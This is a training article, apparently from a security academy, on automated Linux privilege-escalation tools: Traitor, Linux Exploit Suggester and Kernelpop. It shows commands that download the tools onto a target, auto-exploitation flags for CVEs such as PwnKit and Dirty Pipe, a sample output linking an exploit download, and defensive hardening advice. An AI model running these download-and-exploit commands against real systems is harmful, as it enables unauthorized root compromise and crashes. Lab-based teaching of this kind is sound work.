Linux Privilege Escalation Tools — Part 2: Traitor, LES & Kernelpop

In the first part we covered the classic enumeration tools (LinPEAS, LinEnum, LES, linuxprivchecker). In this second part we step further: tools that not only detect but also attempt automated exploitation of known misconfigurations and CVEs. Specifically, we look at three tools: Traitor, Linux Exploit Suggester (LES), and Kernelpop. All of them are strictly for authorized testing and CTF/lab environments.

Legal & ethical scope — CRITICAL: The tools below perform active exploitation of known vulnerabilities. Use them EXCLUSIVELY against intentionally vulnerable VMs (TryHackMe, HackTheBox, Vulnhub, Metasploitable, snapshots of your own lab) or inside engagements with written authorization that explicitly approves exploitation in the Rules of Engagement. On production systems, kernel exploits can crash the kernel — only execute after careful evaluation and prefer non-kernel paths whenever possible.

From enumeration to exploitation

In Part 1, the tools returned lists of “candidate PrivEsc paths”. In Part 2, the tools take the next step: when they find an exploitable path, they execute it automatically and — on success — drop you a root shell. This entails:

• A much larger footprint and higher detection probability.
• Risk of kernel panic or instability on kernel exploits.
• The requirement for explicit exploitation approval in the ROE.

MITRE ATT&CK: TA0004 — Privilege Escalation, T1068 — Exploitation for Privilege Escalation.

1. Traitor — automated PrivEsc in Go

Traitor (liamg, GitHub) is a single static binary written in Go that combines:

• All GTFOBins paths (automatic abuse of sudo/SUID misconfigurations).
• Built-in exploits for select CVEs:
  • CVE-2022-0847 (Dirty Pipe)
  • CVE-2021-4034 (PwnKit)
  • CVE-2021-3560 (polkit)

Advantage: a single binary with no dependencies — runs on nearly any Linux. Ideal when the target ships a minimal toolchain.

Installation (on the lab VM)

# From the release page (replace with the latest version):
wget https://github.com/liamg/traitor/releases/latest/download/traitor-amd64
chmod +x traitor-amd64
mv traitor-amd64 /tmp/traitor

Execution modes

./traitor	Enumeration only — list of candidate PrivEsc paths.
./traitor -p	Interactive selection — pick which exploit to run.
./traitor -a	Auto-exploit — runs the first successful exploit.
./traitor -a -p	Auto-exploit with interactive confirmation before each technique.
./traitor -e <name>	Targeted execution of a specific exploit.

Examples (lab VM, for example a TryHackMe room)

# List only:
/tmp/traitor

# Auto with confirmation:
/tmp/traitor -a -p

# Targeted PwnKit:
/tmp/traitor -e pwnkit

# All flags:
/tmp/traitor --help

2. Linux Exploit Suggester (LES)

LES (mzet-, GitHub) is a Bash script that reads the running kernel/distro and suggests known exploits from its database. It does not execute exploits automatically — it returns instructions and links — which makes it less noisy than Traitor.

Installation

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
chmod +x les.sh

Execution

# Basic run:
./les.sh

# Verbose with all CVEs:
./les.sh --checksec

# Specific kernel (offline mode):
./les.sh --kernel 5.4.0-89-generic --uname-version "Ubuntu" 

Sample output:

[+] [CVE-2022-0847] DirtyPipe (Pipe Buffer)
    Details: https://dirtypipe.cm4all.com/
    Exposure: highly probable
    Tags: ubuntu=(20.04|22.04){kernel:5.8-5.16.10}
    Download URL: https://haxx.in/files/dirtypipez.c

Important: LES can report false positives. Always confirm against a current CVE database (NIST NVD) before running any exploit.

3. Kernelpop

Kernelpop (spencerdodd, GitHub) is a Python tool with the same logic: it finds kernel exploits applicable to the current system and — optionally — can execute them. Supports both Linux and macOS.

Installation

git clone https://github.com/spencerdodd/kernelpop
cd kernelpop
pip3 install -r requirements.txt

Execution (Python mode)

# Enumeration only:
python3 kernelpop.py

# Identify applicable CVEs:
python3 kernelpop.py --identify

# Auto-exploit (lab only):
python3 kernelpop.py --exploit

Standalone binary for offline targets

# Build the binary (requires PyInstaller):
sudo ./create_executable.sh
# → produces a single executable you can carry onto
#   targets that do not have Python.

Note: Kernelpop has not been updated in a while. Always cross-check its findings against newer sources such as LES or the linux-kernel-exploits repo.

When to use which tool

Scenario	Best choice
CTF lab with full access to the VM	Traitor (fast, all-in-one)
Engagement without exploitation approval — enumeration only	LES (no exploitation)
Target without Bash/Python toolchain	Traitor static binary
macOS target	Kernelpop
Report production with CVE references	LES + manual NVD verification

Common mistakes

• Auto-exploit in production: Never. A kernel exploit panic equals downtime plus incident.
• No backup snapshot: Always snapshot the lab VM before an exploit attempt.
• Blind trust in CVE matching: Patches may have been backported without changing the kernel version. Always verify.
• Ignoring footprint: Auto-exploit leaves a huge audit trail. In stealth-required red team work, design manual exploitation.
• Outdated tools: New CVEs are missing from old versions’ databases. Always use the latest version.

Defensive / Blue team perspective

• Patch management: The most effective defense. Apply kernel patches within 30 days for high-severity CVEs.
• Kernel hardening:
  • kernel.dmesg_restrict=1
  • kernel.kptr_restrict=2
  • kernel.unprivileged_userns_clone=0
• auditd rules: Detection of execve from /tmp, /dev/shm, and changes to /etc/passwd.
• seccomp / AppArmor / SELinux: Restricts capabilities even if an exploit succeeds.
• EDR (Falco, Wazuh, CrowdStrike): Signatures for known exploits (PwnKit, DirtyPipe).

Best practices

• Snapshot before exploit on lab VMs.
• Always enumerate first (Part 1 tools), exploit second.
• In the report, record command + timestamp + outcome.
• Prefer misconfiguration-based PrivEsc (sudo/SUID/cron) over kernel exploits — more stable.
• In engagements with stealth requirements, avoid auto-exploit — design a manual chain using Living-off-the-Land binaries.

Summary

Traitor, LES, and Kernelpop cover the phase where enumeration turns into exploitation. They are powerful tools but demand heightened care around scope, target stability, and lawful use. In any CTF lab they are invaluable; in professional engagements, use them only with explicit exploitation approval in the ROE.

Next steps

• Linux Privilege Escalation — Part 1 (Enumeration)
• All Information Gathering articles
• External references: MITRE T1068, GTFOBins, NIST NVD.

For complete training in offensive security and post-exploitation, explore the courses at Audax Cybersecurity Academy.